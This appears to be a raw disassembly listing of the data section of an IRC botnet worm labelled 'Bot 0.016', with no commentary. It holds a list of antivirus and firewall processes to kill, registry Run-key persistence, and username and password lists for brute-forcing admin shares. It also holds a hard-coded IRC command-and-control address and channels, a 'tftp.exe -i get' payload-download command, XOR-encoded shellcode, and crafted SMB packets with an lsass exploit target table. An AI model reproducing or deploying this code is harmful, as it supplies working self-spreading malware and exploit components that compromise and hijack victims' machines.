dd offset aVbcmserv_exe ; "VBCMSERV.EXE"
dd offset aVbcons_exe ; "VBCONS.EXE"
dd offset aVbust_exe ; "VBUST.EXE"
dd offset aVbwin9x_exe ; "VBWIN9X.EXE"
dd offset aVbwinntw_exe ; "VBWINNTW.EXE"
dd offset aVcsetup_exe ; "VCSETUP.EXE"
dd offset aVet32_exe ; "VET32.EXE"
dd offset aVet95_exe ; "VET95.EXE"
dd offset aVettray_exe ; "VETTRAY.EXE"
dd offset aVfsetup_exe ; "VFSETUP.EXE"
dd offset aVirHelp_exe ; "VIR-HELP.EXE"
dd offset aVirusmdpersona ; "VIRUSMDPERSONALFIREWALL.EXE"
dd offset aVnlan300_exe ; "VNLAN300.EXE"
dd offset aVnpc3000_exe ; "VNPC3000.EXE"
dd offset aVpc32_exe ; "VPC32.EXE"
dd offset aVpc42_exe ; "VPC42.EXE"
dd offset aVpfw30s_exe ; "VPFW30S.EXE"
dd offset aVptray_exe ; "VPTRAY.EXE"
dd offset aVscan40_exe ; "VSCAN40.EXE"
dd offset aVscenu6_02d30_ ; "VSCENU6.02D30.EXE"
dd offset aVsched_exe ; "VSCHED.EXE"
dd offset aVsecomr_exe ; "VSECOMR.EXE"
dd offset aVshwin32_exe ; "VSHWIN32.EXE"
dd offset aVsisetup_exe ; "VSISETUP.EXE"
dd offset aVsmain_exe ; "VSMAIN.EXE"
dd offset aVsmon_exe ; "VSMON.EXE"
dd offset aVsstat_exe ; "VSSTAT.EXE"
dd offset aVswin9xe_exe ; "VSWIN9XE.EXE"
dd offset aVswinntse_exe ; "VSWINNTSE.EXE"
dd offset aVswinperse_exe ; "VSWINPERSE.EXE"
dd offset aW32dsm89_exe ; "W32DSM89.EXE"
dd offset aW9x_exe ; "W9X.EXE"
dd offset aWatchdog_exe ; "WATCHDOG.EXE"
dd offset aWebdav_exe ; "WEBDAV.EXE"
dd offset aWebscanx_exe ; "WEBSCANX.EXE"
dd offset aWebtrap_exe ; "WEBTRAP.EXE"
dd offset aWfindv32_exe ; "WFINDV32.EXE"
dd offset aWgfe95_exe ; "WGFE95.EXE"
dd offset aWhoswatchingme ; "WHOSWATCHINGME.EXE"
dd offset aWimmun32_exe ; "WIMMUN32.EXE"
dd offset aWinBugsfix_exe ; "WIN-BUGSFIX.EXE"
dd offset aWin32_exe ; "WIN32.EXE"
dd offset aWin32us_exe ; "WIN32US.EXE"
dd offset aWinactive_exe ; "WINACTIVE.EXE"
dd offset aWindow_exe ; "WINDOW.EXE"
dd offset aWindows_exe ; "WINDOWS.EXE"
dd offset aWininetd_exe ; "WININETD.EXE"
dd offset aWininit_exe ; "WININIT.EXE"
dd offset aWininitx_exe ; "WININITX.EXE"
dd offset aWinlogin_exe ; "WINLOGIN.EXE"
dd offset aWinmain_exe ; "WINMAIN.EXE"
dd offset aWinnet_exe ; "WINNET.EXE"
dd offset aWinppr32_exe ; "WINPPR32.EXE"
dd offset aWinrecon_exe ; "WINRECON.EXE"
dd offset aWinservn_exe ; "WINSERVN.EXE"
dd offset aWinssk32_exe ; "WINSSK32.EXE"
dd offset aWinstart_exe ; "WINSTART.EXE"
dd offset aWinstart001_ex ; "WINSTART001.EXE"
dd offset aWintsk32_exe ; "WINTSK32.EXE"
dd offset aWinupdate_exe ; "WINUPDATE.EXE"
dd offset aWkufind_exe ; "WKUFIND.EXE"
dd offset aWnad_exe ; "WNAD.EXE"
dd offset aWnt_exe ; "WNT.EXE"
dd offset aWradmin_exe ; "WRADMIN.EXE"
dd offset aWrctrl_exe ; "WRCTRL.EXE"
dd offset aWsbgate_exe ; "WSBGATE.EXE"
dd offset aWupdater_exe ; "WUPDATER.EXE"
dd offset aWupdt_exe ; "WUPDT.EXE"
dd offset aWyvernworksfir ; "WYVERNWORKSFIREWALL.EXE"
dd offset aXpf202en_exe ; "XPF202EN.EXE"
dd offset aZapro_exe ; "ZAPRO.EXE"
dd offset aZapsetup3001_e ; "ZAPSETUP3001.EXE"
dd offset aZatutor_exe ; "ZATUTOR.EXE"
dd offset aZonalm2601_exe ; "ZONALM2601.EXE"
dd offset aZonealarm_exe ; "ZONEALARM.EXE"
dd offset a_avp32_exe ; "_AVP32.EXE"
dd offset a_avpcc_exe ; "_AVPCC.EXE"
dd offset a_avpm_exe ; "_AVPM.EXE"
dd offset aHijackthis_exe ; "HIJACKTHIS.EXE"
dd offset aFAgobot_exe ; "F-AGOBOT.EXE"
dd offset aPandaavengine_ ; "PandaAVEngine.exe"
dd offset aSysinfo_exe ; "sysinfo.exe"
dd offset aMscvb32_exe ; "mscvb32.exe"
dd offset aPenis32_exe ; "Penis32.exe"
dd offset aBbeagle_exe ; "bbeagle.exe"
dd offset aSysmonxp_exe ; "SysMonXP.exe"
dd offset aWinupd_exe ; "winupd.exe"
dd offset aWinsys_exe ; "winsys.exe"
dd offset aSsate_exe ; "ssate.exe"
dd offset aRate_exe ; "rate.exe"
dd offset aD3dupdate_exe ; "d3dupdate.exe"
dd offset aIrun4_exe ; "irun4.exe"
dd offset aI11r54n4_exe ; "i11r54n4.exe"
dd offset aMsconfig_exe ; "MsConfiG.exe"
dd offset aWuanclt_exe ; "WUANCLT.EXE"
dd offset aWuacrlt_exe ; "WUACRLT.EXE"
dd offset aWruaclt_exe ; "WRUACLT.EXE"
dd offset aWinssv_exe ; "winssv.exe"
dd offset aScguard_exe ; "scguard.exe"
dd offset aWuamgrd_exe ; "wuamgrd.exe"
dd offset aBling_exe ; "bling.exe"
dd offset aWinmp_exe ; "winmp.exe"
dd offset aHass_exe ; "hass.exe"
dword_42BEB0 dd 1BBh ; sub_40E745+4C2�r
dword_42BEB4 dd 1BBh dword_42BEB8 dd 4DBh dword_42BEBC dd 45h ; sub_408A18+41F5�r
dword_42BEC0 dd 4E20h ; sub_408A18:loc_40CD0D�r
dword_42BEC4 dd 201h dword_42BEC8 dd 1 dword_42BECC dd 1 ; sub_40E745:loc_40EA78�r
byte_42BED0 db 2Eh ; DATA XREF: sub_4025ED:loc_4025F9�r
; sub_408A18+7A4�r ...
align 4
dword_42BED4 dd 6 ; sub_40F9EB+51�r ...
dword_42BED8 dd 1 ; sub_408A18+25D�r ...
dword_42BEDC dd 1 ; sub_408A18+257�r
aBot016 db 'Bot016',0 ; DATA XREF: sub_408A18+2FA1�o
; sub_408A18:loc_40D5A8�o ...
align 4
aBot0_016 db '[Bot 0.016]',0 ; DATA XREF: sub_408A18:loc_40D92D�o
aN3m3s1s db 'n3m3s1s',0 ; DATA XREF: sub_408A18+489C�o
; sub_408A18+5B76�o ...
a217_170_244_2 db '217.170.244.2',0 ; DATA XREF: sub_40E745+3FA�o
; sub_40E745+4B3�o
align 4
aHell db '#hell',0 ; DATA XREF: sub_40E745+416�o
; sub_40E745+4C9�o
align 4
aTroopers db 'troopers',0 ; DATA XREF: sub_40E745+42D�o
; sub_40E745+4DB�o
align 10h
byte_42BF20 db 38h ; DATA XREF: sub_40E745:loc_40EC36�r
; sub_40E745+4FF�o
db 32h, 2Eh, 31h
dd 362E3431h, 35322E34h, 31h
dword_42BF30 dd 6C656823h, 6ChaTroopers_0 db 'troopers',0 ; DATA XREF: sub_40E745+527�o
align 4
byte_42BF44 db 6Dh ; DATA XREF: sub_401141+63�o
; sub_401141+18E�o ...
db 73h, 6Dh, 6Eh
dd 33747261h, 78652E32h, 65h, 2E79656Bh, 747874h
aNetworkHostSer db 'Network Host Service',0 ; DATA XREF: sub_40213F+B�o
align 4
aSoul db '[SOUL]',0 ; DATA XREF: sub_40F9EB+12�o
align 4
aSysconfig_dat db 'sysconfig.dat',0
align 4
aIx db '+ix',0 ; DATA XREF: sub_408A18+5CF5�o
aMurders db '#murders',0 ; DATA XREF: sub_408A18+3F96�o
; sub_408A18+59E9�o
align 4
aHell_1 db '#hell',0
align 4
aSniffing db '#sniffing',0
align 10h
off_42BFB0 dd offset a@celestial_org ; DATA XREF: sub_408A18+5BF4�r
; "*@celestial.org"
off_42BFB4 dd offset aMircV6_12Khale ; DATA XREF: sub_408A18+923�r
; "mIRC v6.12 Khaled Mardam-Bey"
dword_42BFB8 dd 2E373132h, 2E303731h, 2E343432h, 32hdword_42BFC8 dd 15h aSoftwareMicr_0 db 'Software\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: .data:off_42B3CC�o
align 4
db 53h
aOftwareMicroso db 'oftware\Microsoft\Windows\CurrentVersion\RunServices',0
align 4
aSoftwareMicros db 'Software\Microsoft\OLE',0 ; DATA XREF: sub_40FF1B+23�o
; sub_410242+23�o
align 4
aSystemCurrentc db 'SYSTEM\CurrentControlSet\Control\Lsa',0 ; DATA XREF: sub_40FF1B+D5�o
; sub_410242+D5�o
align 8
off_42C078 dd offset aAdministrato_0 ; DATA XREF: .text:00414462�r
; .text:0041446A�o
; "administrator"
dd offset aAdministrador ; "administrador"
dd offset aAdministrateur ; "administrateur"
dd offset aAdministrat ; "administrat"
dd offset aAdmins ; "admins"
dd offset aAdmin ; "admin"
dd offset aStaff ; "staff"
dd offset aRoot ; "root"
dd offset aComputer ; "computer"
dd offset aOwner ; "owner"
dd offset aStudent ; "student"
dd offset aTeacher ; "teacher"
dd offset aWwwadmin ; "wwwadmin"
dd offset aGuest_0 ; "guest"
dd offset aDefault ; "default"
dd offset aDatabase ; "database"
dd offset aDba ; "dba"
dd offset aOracle ; "oracle"
dd offset aDb2 ; "db2"
align 8
dword_42C0C8 dd 420AEAh ; .text:00413DE4�o ...
dd offset aAdministrato_0 ; "administrator"
dd offset aAdministrador ; "administrador"
dd offset aAdministrateur ; "administrateur"
dd offset aAdministrat ; "administrat"
dd offset aAdmins ; "admins"
dd offset aAdmin ; "admin"
dd offset aAdm ; "adm"
dd offset aPassword1 ; "password1"
dd offset aPassword ; "password"
dd offset aPasswd ; "passwd"
dd offset aPass1234 ; "pass1234"
dd offset aPass_0 ; "pass"
dd offset aPwd ; "pwd"
dd offset a007 ; "007"
dd offset a1 ; "1"
dd offset a12 ; "12"
dd offset a123 ; "123"
dd offset a1234 ; "1234"
dd offset a12345 ; "12345"
dd offset a123456 ; "123456"
dd offset a1234567 ; "1234567"
dd offset a12345678 ; "12345678"
dd offset a123456789 ; "123456789"
dd offset a1234567890 ; "1234567890"
dd offset a2000 ; "2000"
dd offset a2001 ; "2001"
dd offset a2002 ; "2002"
dd offset a2003 ; "2003"
dd offset a2004 ; "2004"
dd offset aTest ; "test"
dd offset aGuest_0 ; "guest"
dd offset aNone ; "none"
dd offset aDemo ; "demo"
dd offset aUnix ; "unix"
dd offset aLinux ; "linux"
dd offset aChangeme ; "changeme"
dd offset aDefault ; "default"
dd offset aSystem ; "system"
dd offset aServer ; "server"
dd offset aRoot ; "root"
dd offset aNull_0 ; "null"
dd offset aQwerty ; "qwerty"
dd offset aMail ; "mail"
dd offset aOutlook ; "outlook"
dd offset aWeb ; "web"
dd offset aWww ; "www"
dd offset aInternet ; "internet"
dd offset aAccounts ; "accounts"
dd offset aAccounting ; "accounting"
dd offset aHome ; "home"
dd offset aHomeuser ; "homeuser"
dd offset aUser ; "user"
dd offset aOem ; "oem"
dd offset aOemuser ; "oemuser"
dd offset aOeminstall ; "oeminstall"
dd offset aWindows ; "windows"
dd offset aWin98 ; "win98"
dd offset aWin2k ; "win2k"
dd offset aWinxp ; "winxp"
dd offset aWinnt ; "winnt"
dd offset aWin2000 ; "win2000"
dd offset aQaz ; "qaz"
dd offset aAsd ; "asd"
dd offset aZxc ; "zxc"
dd offset aQwe ; "qwe"
dd offset aBob ; "bob"
dd offset aJen ; "jen"
dd offset aJoe ; "joe"
dd offset aFred ; "fred"
dd offset aBill ; "bill"
dd offset aMike ; "mike"
dd offset aJohn ; "john"
dd offset aPeter ; "peter"
dd offset aLuke ; "luke"
dd offset aSam ; "sam"
dd offset aSue ; "sue"
dd offset aSusan ; "susan"
dd offset aPeter ; "peter"
dd offset aBrian ; "brian"
dd offset aLee ; "lee"
dd offset aNeil ; "neil"
dd offset aIan ; "ian"
dd offset aChris ; "chris"
dd offset aEric ; "eric"
dd offset aGeorge ; "george"
dd offset aKate ; "kate"
dd offset aBob ; "bob"
dd offset aKatie ; "katie"
dd offset aMary ; "mary"
dd offset aLogin ; "login"
dd offset aLoginpass ; "loginpass"
dd offset aTechnical ; "technical"
dd offset aBackup ; "backup"
dd offset aExchange ; "exchange"
dd offset aFuck ; "fuck"
dd offset aBitch ; "bitch"
dd offset aSlut ; "slut"
dd offset aSex ; "sex"
dd offset aGod ; "god"
dd offset aHell_0 ; "hell"
dd offset aHello ; "hello"
dd offset aDomain ; "domain"
dd offset aDomainpass ; "domainpass"
dd offset aDomainpassword ; "domainpassword"
dd offset aDatabase ; "database"
dd offset aAccess ; "access"
dd offset aDbpass ; "dbpass"
dd offset aDbpassword ; "dbpassword"
dd offset aDatabasepass ; "databasepass"
dd offset aData ; "data"
dd offset aDatabasepasswo ; "databasepassword"
dd offset aDb1 ; "db1"
dd offset aDb2 ; "db2"
dd offset aDb1234 ; "db1234"
dd offset aSa ; "sa"
dd offset aSql ; "sql"
dd offset aSqlpassoainsta ; "sqlpassoainstall"
dd offset aOrainstall ; "orainstall"
dd offset aOracle ; "oracle"
dd offset aIbm ; "ibm"
dd offset aCisco ; "cisco"
dd offset aDell ; "dell"
dd offset aCompaq ; "compaq"
dd offset aSiemens ; "siemens"
dd offset aHp ; "hp"
dd offset aNokia ; "nokia"
dd offset aXp ; "xp"
dd offset aControl ; "control"
dd offset aOffice ; "office"
dd offset aBlank ; "blank"
dd offset aWinpass ; "winpass"
dd offset aMain ; "main"
dd offset aLan ; "lan"
dd offset aInternet ; "internet"
dd offset aIntranet ; "intranet"
dd offset aStudent ; "student"
dd offset aTeacher ; "teacher"
dd offset aStaff ; "staff"
align 8
dword_42C2F8 dd 10h ; sub_408A18+804�r ...
align 10h
dword_42C300 dd 736E6F63h dd 74h, 0
dword_42C30C dd 1 off_42C310 dd offset sub_40F9EB ; DATA XREF: sub_40FD06+6C�r
aLetter db 'letter',0
align 10h
dd 2, 40FA49h, 706D6F63h, 2 dup(0)
dd 3, 40FA96h, 6E756F63h, 797274h, 0
dd 4, 40FB05h, 736Fh, 2 dup(0)
dd 5, 40FB7Ah
dword_42C364 dd 1D4C0h off_42C368 dd offset aIpc ; DATA XREF: sub_40FF1B:loc_4100D1�r
; sub_40FF1B+1C4�r ...
; "IPC$"
dword_42C36C dd 0 dd offset aAdmin_0 ; "ADMIN$"
align 8
dd offset aC_3 ; "C$"
dd offset aC_2 ; "C:\\"
dd offset aD_3 ; "D$"
dd offset aD_2 ; "D:\\"
; ---------------------------------------------------------------------------
loc_42C388: ; DATA XREF: sub_410BDF+C0�o
jmp short loc_42C38C
; ---------------------------------------------------------------------------
loc_42C38A: ; CODE XREF: .data:loc_42C38C�p
jmp short loc_42C391
; ---------------------------------------------------------------------------
loc_42C38C: ; CODE XREF: .data:loc_42C388�j
call loc_42C38A
loc_42C391: ; CODE XREF: .data:loc_42C38A�j
pop ebx
xor ecx, ecx
; ---------------------------------------------------------------------------
db 66h, 0B9h
word_42C396 dw 0FFFFh ; DATA XREF: sub_410BDF:loc_410C92�w
db 80h, 73h, 0Eh
byte_42C39B db 0FFh ; DATA XREF: sub_410BDF+BA�w
dd 0F9E243h
; ---------------------------------------------------------------------------
loc_42C3A0: ; DATA XREF: sub_410BDF+9C�o
jmp short loc_42C3A4
; ---------------------------------------------------------------------------
loc_42C3A2: ; CODE XREF: .data:loc_42C3A4�p
jmp short loc_42C3A9
; ---------------------------------------------------------------------------
loc_42C3A4: ; CODE XREF: .data:loc_42C3A0�j
call loc_42C3A2
loc_42C3A9: ; CODE XREF: .data:loc_42C3A2�j
pop ebx
xor ecx, ecx
; ---------------------------------------------------------------------------
db 0B1h
byte_42C3AD db 0FFh ; DATA XREF: sub_410BDF+A1�w
dw 7380h
db 0Ch
byte_42C3B1 db 0FFh ; DATA XREF: sub_410BDF+A7�w
dw 0E243h
dd 0F9h
dword_42C3B8 dd 364C033h, 0C783040h, 8B0C408Bh, 8BAD1C70h, 9EB0840h
; DATA XREF: sub_410ACC+72�o
dd 8D34408Bh, 408B7C40h, 3D08B3Ch, 0CA8B3C40h, 8B784803h
dd 0DA8B2041h, 331C5903h, 57F633FFh, 3CA8B57h, 7981100Ch
dd 7373650Ah, 8B027541h, 3798133h, 72685474h, 3B8B0275h
dd 8304C083h, 0F68504C3h, 0FF85DB74h, 0F203D774h, 0E857FA03h
dword_42C41C dd 12h aTftp_exeIGet db 'tftp.exe -i get ',0 ; DATA XREF: sub_410ACC+96�o
aJ_0 db 'j',0
db 0E8h
dword_42C435 dd 17h ; ---------------------------------------------------------------------------
jnz short near ptr byte_42C43C
retn
; ---------------------------------------------------------------------------
byte_42C43C db 0E8h ; CODE XREF: .data:0042C439�j
dword_42C43D dd 1 byte_42C441 db 0, 6Ah, 0 ; DATA XREF: sub_410ACC+EC�o
dd 7E8h
db 0, 0Fh, 84h
dword_42C44B dd 0FFFFFFEDh ; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
pop eax
pop ebx
pop ebp
push eax
sub esp, 54h
xor eax, eax
mov edi, esp
lea ecx, [eax+40h]
mov edx, edi
rep stosb
mov al, 44h
stosd
push edi
push edx
push ecx
push ecx
push 28h
push 1
push ecx
push ecx
push ebp
push ebx
call esi
add esp, 54h
test eax, eax
retn
; ---------------------------------------------------------------------------
align 10h
loc_42C480: ; DATA XREF: sub_4127BC:loc_4128D5�o
mov edi, ecx
xor al, al
inc al
repne scasb
jmp edi
; ---------------------------------------------------------------------------
align 10h
a?xmlVersion1_0 db '<?xml version="1.0"?>',0Dh,0Ah ; DATA XREF: sub_4127BC+18B�o
db '<g:searchrequest xmlns:g="DAV:">',0Dh,0Ah
db '<g:sql>',0Dh,0Ah
db 'Select "DAV:displayname" from scope()',0Dh,0Ah
db '</g:sql>',0Dh,0Ah
db '</g:searchrequest>',0Dh,0Ah,0
; ---------------------------------------------------------------------------
jmp short loc_42C52A
; =============== S U B R O U T I N E =======================================
sub_42C51A proc far ; CODE XREF: sub_42C51A:loc_42C52A�p
pop ebx
dec ebx
xor ecx, ecx
mov cx, 125h
loc_42C522: ; CODE XREF: sub_42C51A+C�j
xor byte ptr [ebx+ecx], 99h
loop loc_42C522
jmp short loc_42C52F
; ---------------------------------------------------------------------------
loc_42C52A: ; CODE XREF: .data:0042C518�j
call near ptr sub_42C51A
loc_42C52F: ; CODE XREF: sub_42C51A+E�j
jo short loc_42C593
cdq
cdq
cdq
mov ch, 38h
test eax, 12999999h
fst dword ptr [ebp+3485E912h]
adc dh, cl
xchg eax, ecx
adc ch, [esi-0Dh]
popf
sal byte ptr [ecx+2], 99h
cdq
cdq
jnp short loc_42C5B1
icebp
stosb
stosd
cdq
cdq
icebp
out dx, al
jmp far ptr 128Fh:66CDC6ABh
; ---------------------------------------------------------------------------
db 71h
dd 71C09DF3h, 9999991Bh, 7518607Bh, 99999809h, 9898F1CDh
dd 0CF669999h, 0C9C9C989h, 0D9C9D9C9h, 8DCF66C9h, 0E6F14112h
dd 0F1989999h, 4B9D999Bh
; ---------------------------------------------------------------------------
adc dl, [ebp-0Dh]
loc_42C593: ; CODE XREF: sub_42C51A:loc_42C52F�j
mov eax, ecx
retf 0CF66h
; ---------------------------------------------------------------------------
dd 0EC591C81h, 0F4FAF1D3h, 0FF1099FDh, 0CD751AA9h, 0F3BDA514h
dd 7B32C08Ch
db 64h
; ---------------------------------------------------------------------------
loc_42C5B1: ; CODE XREF: sub_42C51A+35�j
pop edi
fnstsw word ptr [ebp-22982277h]
mov ebp, 0BDC510A4h
rcl dword ptr [eax], 1
lds edi, [ebp-423AEF2Bh]
leave
adc al, 0DDh
mov ebp, 0C8C9CD89h
enter 0FFFFF3C8h, 98h
enter 66C8h, 0EFh
test eax, 9DCF66C8h
adc dl, [ebp-0Dh]
db 66h, 66h
test al, 66h
iret
sub_42C51A endp ; sp-analysis failed
; ---------------------------------------------------------------------------
xchg eax, ecx
retf 0CF66h
; ---------------------------------------------------------------------------
dw 6685h
dd 0CFC895CFh, 12A5DC12h, 9AE1B1CDh, 0EB12CB4Ch, 0AA6C9AB9h
dd 34D8D050h, 42AA5C9Ah, 0A3892796h, 5891ED4Fh, 439A9452h
dd 0A26872D9h, 0C37EEC86h, 9ABDC312h, 9512FF44h, 85C312D2h
dd 9D12449Ah, 325C9A12h, 715AC0C7h, 66666699h, 7597D717h
dd 8F2A67EBh, 579C4034h, 0F9795776h, 0A2657452h, 346C9040h
dd 0F9336075h, 0E05FE07Eh, 0
; ---------------------------------------------------------------------------
loc_42C658: ; DATA XREF: sub_4130F8+112�o
; sub_4130F8+1D9�o
jmp short loc_42C66A
; =============== S U B R O U T I N E =======================================
sub_42C65A proc near ; CODE XREF: sub_42C65A:loc_42C66A�p
pop edx
dec edx
xor ecx, ecx
mov cx, 17Dh
loc_42C662: ; CODE XREF: sub_42C65A+C�j
xor byte ptr [edx+ecx], 99h
loop loc_42C662
jmp short loc_42C66F
; ---------------------------------------------------------------------------
loc_42C66A: ; CODE XREF: .data:loc_42C658�j
call sub_42C65A
loc_42C66F: ; CODE XREF: sub_42C65A+E�j
jo short near ptr dword_42C5E8+1Eh
cwde
cdq
cdq
retn
sub_42C65A endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 0FDh, 38h, 0A9h
dd 12999999h, 0E91295D9h, 0D9123485h, 12411291h, 0ED12A5EAh
dd 6A9AE187h, 9AB9E712h, 8DD71262h, 0CECF74AAh, 9AA612C8h
dd 0F36B1262h, 3F6AC097h, 0C6C091EDh, 0DC9D5E1Ah, 0C6C0707Bh
dd 125412C7h, 5A9ABDDFh, 589A7848h, 12FF50AAh, 85DF1291h
dd 78585A9Ah, 12589A9Bh, 125A9A99h, 1A6E1263h, 4912975Fh
dd 71C09AF3h, 9999991Eh, 0CB945F1Ah, 65CE66CFh, 0F34112C3h
dd 0ED71C09Ch, 0C9999999h, 0F3C9C9C9h, 669BF398h, 411275CEh
dd 999B9E5Eh
word_42C708 dw 4B9Dh ; DATA XREF: sub_4130F8+E5�w
dw 59AAh
dd 0F39DDE10h, 66CACE89h, 98F369CEh, 6DCE66CAh, 66CAC9C9h
dd 491261CEh, 12DD751Ah, 0F359AA6Dh, 9D10C089h, 10627B17h
dd 0CF10A1CFh, 0D9CF10A5h, 0B5DF5EFFh, 0DE149898h, 0AACFC989h
dd 0C8C8C850h, 0C8C898F3h, 0FAA5DE5Eh, 1499FDF4h, 0C8C9A5DEh
dd 0CB79CE66h, 0CA65CE66h, 0C965CE66h, 0AA7DCE66h, 591C3559h
dd 0CBC860ECh, 4B66CACFh, 7B32C0C3h, 5A59AA77h, 66677671h
dd 0EDFCDE66h, 0FAF6EBC9h, 0EBFDFDD8h, 99EAEAFCh, 0F8FCEBDAh
dd 0EBC9FCEDh, 0EAFCFAF6h, 0DC99D8EAh, 0CDEDF0E1h, 0F8FCEBF1h
dd 0F6D599FDh, 0F0D5FDF8h, 0EBF8EBFBh, 0EE99D8E0h, 0AAC6ABEAh
dd 0CACE99ABh, 0FAF6CAD8h, 0D8EDFCF2h, 0F7F0FB99h, 0F0F599FDh
dd 0F7FCEDEAh, 0FAFAF899h, 99EDE9FCh, 0EAF6F5FAh, 0FAF6EAFCh
dd 99EDFCF2h, 0
dword_42C7F0 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: .text:00413576�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 2 dup(0)
dword_42C880 dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: .text:004135A2�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 10h
dword_42C930 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: .text:004135CA�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_42CA10 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_4130F8+53�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC_4: ; DATA XREF: sub_4130F8+90�o
unicode 0, <C$>,0
a????? db '?????',0
dd 2 dup(0)
dword_42CA78 dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_4130F8+28B�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 2 dup(0)
dword_42CAE8 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_4130F8+2B2�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 2 dup(0)
dword_42CB90 dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_4130F8+383�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
off_42CC10 dd offset loc_401495 ; DATA XREF: sub_4130F8+3A6�o
dd 3, 40707Ch, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset loc_40707C
dd 1, 0
dd 1, 0
dd offset loc_40707C
dd 1, 0
dd 1, 0
dd offset loc_40707C
dd 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 2 dup(0)
dword_42CCA8 dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: sub_4130F8+2E2�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 2 dup(0)
dword_42CD18 dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_4130F8+307�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 2 dup(0)
dword_42CD90 dd 0 dd offset loc_40A89A
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset loc_40A89A
dd 1, 0
dd 1, 0
dd offset loc_40A89A
dd 1, 0
dd 1, 0
dd offset loc_40A89A
dd 1, 0
dd 1, 2 dup(0)
word_42CE18 dw 0AD9Dh ; DATA XREF: sub_412FB5+2A�r
; sub_4130F8+CC�r
align 4
dd 2 dup(0)
aWinxpProfessio db 'WinXP Professional [universal] lsass.exe ',0
align 8
dword_42CE58 dd 1004600h ; sub_4130F8+223�r
dd 1, 326E6957h, 7250206Bh, 7365666Fh, 6E6F6973h, 20206C61h
dd 755B2020h, 6576696Eh, 6C617372h, 656E205Dh, 70617274h
dd 6C6C642Eh, 2 dup(0)
dd 7515123Ch, 2, 326E6957h, 6441206Bh, 636E6176h, 53206465h
dd 65767265h, 535B2072h, 205D3450h, 20202020h, 656E2020h
dd 70617274h, 6C6C642Eh, 2 dup(0)
dd 751C123Ch, 0Fh dup(0)
; ---------------------------------------------------------------------------
loc_42CF10: ; DATA XREF: .text:0041381A�o
; .text:00413898�o
jmp short loc_42CF22
; =============== S U B R O U T I N E =======================================
sub_42CF12 proc near ; CODE XREF: sub_42CF12:loc_42CF22�p
pop edx
dec edx
xor ecx, ecx
mov cx, 17Dh
loc_42CF1A: ; CODE XREF: sub_42CF12+C�j
xor byte ptr [edx+ecx], 99h
loop loc_42CF1A
jmp short loc_42CF27
; ---------------------------------------------------------------------------
